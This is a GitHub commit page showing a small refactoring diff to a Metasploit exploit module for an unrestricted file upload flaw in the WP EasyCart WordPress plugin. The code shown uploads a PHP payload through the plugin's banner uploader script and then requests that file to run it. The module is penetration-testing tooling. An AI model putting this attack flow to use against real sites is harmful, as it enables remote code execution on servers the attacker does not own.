Skip to content

Commit 8a89b3b

Browse files
rastatingrastating
committed
Cleanup of various bits of code
1 parent 8246f4e commit 8a89b3b

File tree

1 file changed

+10
-6
lines changed

1 file changed

+10
-6
lines changed

modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb

Lines changed: 10 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -4,7 +4,6 @@
44
##
55

66
require 'msf/core'
7-
require 'digest/md5'
87

98
class Metasploit3 < Msf::Exploit::Remote
109
Rank = ExcellentRanking
@@ -91,7 +90,7 @@ def req_id
9190
if ec_password_is_hash
9291
return ec_password
9392
else
94-
return Digest::MD5.hexdigest(ec_password)
93+
return Rex::Text.md5(ec_password)
9594
end
9695
end
9796

@@ -107,11 +106,15 @@ def generate_mime_message(payload, date_hash, name, include_req_id)
107106
data
108107
end
109108

110-
def exploit
109+
def setup
111110
if !use_wordpress_authentication && !use_ec_authentication
112111
fail_with(Failure::BadConfig, 'You must set either the USERNAME and PASSWORD options or specify an EC_PASSWORD value')
113112
end
114113

114+
super
115+
end
116+
117+
def exploit
115118
vprint_status("#{peer} - WordPress authentication attack is enabled") if use_wordpress_authentication
116119
vprint_status("#{peer} - EC authentication attack is enabled") if use_ec_authentication
117120

@@ -134,10 +137,11 @@ def exploit
134137

135138
print_status("#{peer} - Preparing payload...")
136139
payload_name = Rex::Text.rand_text_alpha(10)
137-
date_hash = Digest::MD5.hexdigest(Time.now.to_s)
140+
date_hash = Rex::Text.md5(Time.now.to_s)
141+
uploaded_filename = "#{payload_name}_#{date_hash}.php"
138142
plugin_url = normalize_uri(wordpress_url_plugins, 'wp-easycart')
139143
uploader_url = normalize_uri(plugin_url, 'inc', 'amfphp', 'administration', 'banneruploaderscript.php')
140-
payload_url = normalize_uri(plugin_url, 'products', 'banners', "#{payload_name}_#{date_hash}.php")
144+
payload_url = normalize_uri(plugin_url, 'products', 'banners', uploaded_filename)
141145
data = generate_mime_message(payload, date_hash, "#{payload_name}.php", use_ec_authentication)
142146

143147
print_status("#{peer} - Uploading payload to #{payload_url}")
@@ -153,7 +157,7 @@ def exploit
153157
vprint_error("#{peer} - Server responded with status code #{res.code}") if res.code != 200
154158

155159
print_status("#{peer} - Executing the payload...")
156-
register_files_for_cleanup("#{payload_name}_#{date_hash}.php")
160+
register_files_for_cleanup(uploaded_filename)
157161
res = send_request_cgi(
158162
{
159163
'uri' => payload_url,

0 commit comments

Comments
 (0)